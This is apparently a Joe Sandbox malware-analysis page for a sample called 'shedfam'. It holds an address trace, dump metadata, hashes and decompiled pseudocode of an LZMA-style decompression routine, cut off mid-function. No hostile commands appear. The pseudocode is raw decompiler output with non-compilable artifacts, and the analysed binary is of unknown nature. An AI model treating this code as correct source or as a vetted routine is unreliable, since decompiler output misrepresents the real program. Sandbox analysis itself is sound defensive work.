0x00406445
0x0040644a
0x0040644c
0x0040644e
0x0040644e
0x00406470
0x00406477
0x0040647a
0x00000000
0x00406480
0x00000000
0x00406480
0x00000000
0x00406485
0x00406485
0x00406489
0x00406b49
0x00000000
0x00406b49
0x0040648f
0x00406492
0x00406495
0x00406499
0x0040649c
0x004064a2
0x004064a4
0x004064a4
0x004064a4
0x004064a7
0x004064aa
0x004064aa
0x004064aa
0x004064b0
0x00000000
0x00000000
0x004064b2
0x004064b5
0x004064b8
0x004064bb
0x004064be
0x004064c1
0x004064c4
0x004064c7
0x004064ca
0x004064cd
0x004064d0
0x004064e8
0x004064eb
0x004064ee
0x004064f1
0x004064f1
0x004064f4
0x004064f8
0x004064fa
0x004064d2
0x004064d2
0x004064da
0x004064df
0x004064e1
0x004064e3
0x004064e3
0x004064fd
0x00406504
0x00406507
0x00000000
0x00406509
0x00000000
0x00406509
0x00406507
0x0040650e
0x0040650e
0x0040650e
0x0040650e
0x00000000
0x00000000
0x00406549
0x00406549
0x0040654d
0x00406b55
0x00000000
0x00406b55
0x00406553
0x00406556
0x00406559
0x0040655d
0x00406560
0x00406566
0x00406568
0x00406568
0x00406568
0x0040656b
0x0040656e
0x0040656e
0x00406574
0x00406512
0x00406512
0x00406515
0x00000000
0x00406515
0x00406576
0x00406576
0x00406579
0x0040657c
0x0040657f
0x00406582
0x00406585
0x00406588
0x0040658b
0x0040658e
0x00406591
0x00406594
0x004065ac
0x004065af
0x004065b2
0x004065b5
0x004065b5
0x004065b8
0x004065bc
0x004065be
0x00406596
0x00406596
0x0040659e
0x004065a3
0x004065a5
0x004065a7
0x004065a7
0x004065c1
0x004065c8
0x004065cb
0x00000000
0x004065cd
0x00000000
0x004065cd
0x00000000
0x0040685a
0x0040685a
0x0040685e
0x00406b85
0x00000000
0x00406b85
0x00406864
0x00406867
0x0040686a
0x0040686e
0x00406871
0x00406877
0x00406879
0x00406879
0x00406879
0x0040687c
0x00000000
0x00000000
0x00000000
0x00000000
0x00406969
0x0040696d
0x0040698f
0x00406992
0x0040699c
0x0040699f
0x0040699f
0x0040699f
0x00000000
0x0040699f
0x0040699f
0x0040696f
0x00406972
0x00406976
0x00406979
0x00406979
0x0040697c
0x00000000
0x00000000
0x00406a26
0x00406a2a
0x00406a48
0x00406a48
0x00406a48
0x00406a4f
0x00406a56
0x00406a5d
0x00406a5d
0x00000000
0x00406a5d
0x00406a2c
0x00406a2f
0x00406a32
0x00406a35
0x00406a3c
0x00406980
0x00406980
0x00406983
0x00000000
0x00000000
0x00406b17
0x00406b1a
0x00406a1b
0x00000000
0x00000000
0x00406751
0x00406753
0x0040675a
0x0040675b
0x0040675d
0x00406760
0x00000000
0x00000000
0x00406768
0x0040676b
0x0040676e
0x00406770
0x00406772
0x00406772
0x00406773
0x00406776
0x0040677d
0x00406780
0x0040678e
0x00000000
0x00000000
0x00406a64
0x00406a64
0x00406a67
0x00406a6e
0x00000000
0x00000000
0x00406a73
0x00406a73
0x00406a77
0x00406baf
0x00000000
0x00406baf
0x00406a7d
0x00406a80
0x00406a83
0x00406a87
0x00406a8a
0x00406a90
0x00406a92
0x00406a92
0x00406a92
0x00406a95
0x00406a98
0x00406a98
0x00406a98
0x00406a98
0x00406a9b
0x00406a9b
0x00406a9f
0x00406aff
0x00406b02
0x00406b07
0x00406b08
0x00406b0a
0x00406b0c
0x00406b0f
0x00406a1b
0x00406a1b
0x00000000
0x00406a21
0x00406a1b
0x00406aa1
0x00406aa7
0x00406aaa
0x00406aad
0x00406ab0
0x00406ab3
0x00406ab6
0x00406ab9
0x00406abc
0x00406abf
0x00406ac2
0x00406adb
0x00406ade
0x00406ae1
0x00406ae4
0x00406ae8
0x00406aea
0x00406aea
0x00406aeb
0x00406aee
0x00406ac4
0x00406ac4
0x00406acc
0x00406ad1
0x00406ad3
0x00406ad6
0x00406ad6
0x00406af1
0x00406af8
0x00000000
0x00406afa
0x00000000
0x00406afa
0x00000000
0x00406796
0x00406799
0x004067cf
0x004068ff
0x004068ff
0x004068ff
0x004068ff
0x00406902
0x00406902
0x00406905
0x00406907
0x00406b91
0x00000000
0x00406b91
0x0040690d
0x00406910
0x00000000
0x00000000
0x00406916
0x0040691a
0x0040691d
0x0040691d
0x0040691d
0x00000000
0x0040691d
0x0040679b
0x0040679d
0x0040679f
0x004067a1
0x004067a4
0x004067a5
0x004067a7
0x004067a9
0x004067ac
0x004067af
0x004067c5
0x004067ca
0x00406802
0x00406802
0x00406806
0x00406832
0x00406834
0x0040683b
0x0040683e
0x00406841
0x00406841
0x00406846
0x00406846
0x00406848
0x0040684b
0x00406852
0x00406855
0x00406882
0x00406882
0x00406885
0x00406888
0x004068fc
0x004068fc
0x004068fc
0x00000000
0x004068fc
0x0040688a
0x00406890
0x00406893
0x00406896
0x00406899
0x0040689c
0x0040689f
0x004068a2
0x004068a5
0x004068a8
0x004068ab
0x004068c4
0x004068c6
0x004068c9
0x004068ca
0x004068cd
0x004068cf
0x004068d2
0x004068d4
0x004068d6
0x004068d9
0x004068db
0x004068de
0x004068e2
0x004068e4
0x004068e4
0x004068e5
0x004068e8
0x004068eb
0x004068ad
0x004068ad
0x004068b5
0x004068ba
0x004068bc
0x004068bf
0x004068bf
0x004068ee
0x004068f5
0x0040687f
0x0040687f
0x0040687f
0x0040687f
0x00000000
0x004068f7
0x00000000
0x004068f7
0x004068f5
0x00406808
0x0040680b
0x0040680d
0x00406810
0x00406813
0x00406816
0x00406818
0x0040681b
0x0040681e
0x0040681e
0x00406821
0x00406821
0x00406824
0x0040682b
0x004067ff
0x004067ff
0x004067ff
0x004067ff
0x00000000
0x0040682d
0x00000000
0x0040682d
0x0040682b
0x004067b1
0x004067b4
0x004067b6
0x004067b9
0x00000000
0x00000000
0x00406518
0x00406518
0x0040651c
0x00406b61
0x00000000
0x00406b61
0x00406522
0x00406525
0x00406528
0x0040652b
0x0040652e
0x00406531
0x00406534
0x00406536
0x00406539
0x0040653c
0x0040653f
0x00406541
0x00406541
0x00406541
0x00000000
0x00000000
0x004066a3
0x004066a3
0x004066a7
0x00406b6d
0x00000000
0x00406b6d
0x004066ad
0x004066b0
0x004066b3
0x004066b6
0x004066b8
0x004066b8
0x004066b8
0x004066bb
0x004066be
0x004066c1
0x004066c4
0x004066c7
0x004066ca
0x004066cb
0x004066cd
0x004066cd
0x004066cd
0x004066d0
0x004066d3
0x004066d6
0x004066d9
0x004066d9
0x004066d9
0x004066dc
0x004066de
0x004066de
0x00000000
0x00000000
0x00406920
0x00406920
0x00406920
0x00406924
0x00000000
0x00000000
0x0040692a
0x0040692d
0x00406930
0x00406933
0x00406935
0x00406935
0x00406935
0x00406938
0x0040693b
0x0040693e
0x00406941
0x00406944
0x00406947
0x00406948
0x0040694a
0x0040694a
0x0040694a
0x0040694d
0x00406950
0x00406953
0x00406956
0x00406959
0x0040695d
0x0040695f
0x00406962
0x00000000
0x00406964
0x004066e1
0x004066e1
0x00000000
0x004066e1
0x00406962
0x00406b97
0x00000000
0x00000000
0x004061c6
0x00406bce
0x00406bce
0x00000000
0x00406bce
0x00406a1b
0x004069a2
0x0040699f
0x00000000
0x004066f4

Memory Dump Source

Source File: 00000000.00000002.257281468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.257256064.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257318535.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257326105.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257337622.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257354953.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257362306.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257368418.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_shedfam.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 804fba803cbd16a140b159ae7d26de6fa0620b5d9a2f4af6b8021cca2140f9f9
Instruction ID: 7be6eb69932b41c0b27de07e5fb880b338722213318b425ba270fb710fdbb197
Opcode Fuzzy Hash: 804fba803cbd16a140b159ae7d26de6fa0620b5d9a2f4af6b8021cca2140f9f9
Instruction Fuzzy Hash: FE714671E00228CBDF28CF98C8447ADBBB1FB44305F15816ED856BB281C778AA96DF44

Uniqueness

Uniqueness Score: -1.00%

Function 0040663C Relevance: 5.2, APIs: 4, Instructions: 168
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E0040663C() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						 *(_t613 - 0x84) = 0xa;
						_t606 =  *(_t613 - 4) + 0x1b0 +  *(_t613 - 0x38) * 2;
					} else {
						 *(__ebp - 0x84) = 9;
						 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
					}
					while(1) {
						 *(_t613 - 0x54) = _t606;
						while(1) {
							L133:
							_t531 =  *_t606;
							_t589 = _t531 & 0x0000ffff;
							_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
							if( *(_t613 - 0xc) >= _t565) {
								 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
								 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
								 *(_t613 - 0x40) = 1;
								_t532 = _t531 - (_t531 >> 5);
								 *_t606 = _t532;
							} else {
								 *(_t613 - 0x10) = _t565;
								 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
								 *_t606 = (0x800 - _t589 >> 5) + _t531;
							}
							if( *(_t613 - 0x10) >= 0x1000000) {
								goto L139;
							}
							L137:
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 5;
								L170:
								_t568 = 0x22;
								memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
								_t535 = 0;
								L172:
								return _t535;
							}
							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							L139:
							_t533 =  *(_t613 - 0x84);
							while(1) {
								 *(_t613 - 0x88) = _t533;
								while(1) {
									L1:
									_t534 =  *(_t613 - 0x88);
									if(_t534 > 0x1c) {
										break;
									}
									switch( *((intOrPtr*)(_t534 * 4 +  &M00406BD6))) {
										case 0:
											if( *(_t613 - 0x6c) == 0) {
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
											_t534 =  *( *(_t613 - 0x70));
											if(_t534 > 0xe1) {
												goto L171;
											}
											_t538 = _t534 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t570);
											_push(9);
											_pop(_t571);
											_t609 = _t538 / _t570;
											_t540 = _t538 % _t570 & 0x000000ff;
											asm("cdq");
											_t604 = _t540 % _t571 & 0x000000ff;
											 *(_t613 - 0x3c) = _t604;
											 *(_t613 - 0x1c) = (1 << _t609) - 1;
											 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
											_t612 = (0x300 << _t604 + _t609) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
												L10:
												if(_t612 == 0) {
													L12:
													 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t612 = _t612 - 1;
													 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
												} while (_t612 != 0);
												goto L12;
											}
											if( *(_t613 - 4) != 0) {
												GlobalFree( *(_t613 - 4));
											}
											_t534 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t613 - 4) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t613 - 0x6c);
											if( *(_t613 - 0x6c) == 0) {
												 *(_t613 - 0x88) = 1;
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
											_t45 = _t613 - 0x48;
											 *_t45 =  *(_t613 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t613 - 0x48) < 4) {
												goto L13;
											}
											_t546 =  *(_t613 - 0x40);
											if(_t546 ==  *(_t613 - 0x74)) {
												L20:
												 *(_t613 - 0x48) = 5;
												 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											 *(_t613 - 0x74) = _t546;
											if( *(_t613 - 8) != 0) {
												GlobalFree( *(_t613 - 8));
											}
											_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
											 *(_t613 - 8) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
											 *(_t613 - 0x84) = 6;
											 *(_t613 - 0x4c) = _t553;
											_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
											 *(_t613 - 0x54) = _t606;
											goto L133;
										case 3:
											L21:
											__eflags =  *(_t613 - 0x6c);
											if( *(_t613 - 0x6c) == 0) {
												 *(_t613 - 0x88) = 3;
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											_t67 = _t613 - 0x70;
											 *_t67 =  &(( *(_t613 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
											L23:
											 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
											if( *(_t613 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t531 =  *_t606;
											_t589 = _t531 & 0x0000ffff;
											_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
											if( *(_t613 - 0xc) >= _t565) {
												 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
												 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
												 *(_t613 - 0x40) = 1;
												_t532 = _t531 - (_t531 >> 5);
												 *_t606 = _t532;
											} else {
												 *(_t613 - 0x10) = _t565;
												 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
												 *_t606 = (0x800 - _t589 >> 5) + _t531;
											}
											if( *(_t613 - 0x10) >= 0x1000000) {
												goto L139;
											}
										case 5:
											goto L137;
										case 6:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											while(1) {
												 *(_t613 - 0x54) = _t606;
												goto L133;
											}
										case 8:
											goto L0;
										case 9:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L89;
											}
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t258 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t258;
											0 | _t258 = _t258 + _t258 + 9;
											 *(__ebp - 0x38) = _t258 + _t258 + 9;
											goto L75;
										case 0xa:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x28);
											goto L88;
										case 0xb:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L88:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L89:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L99:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t334 = __ebp - 0x70;
											 *_t334 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t334;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L101;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												goto L58;
											}
										case 0x10:
											L109:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
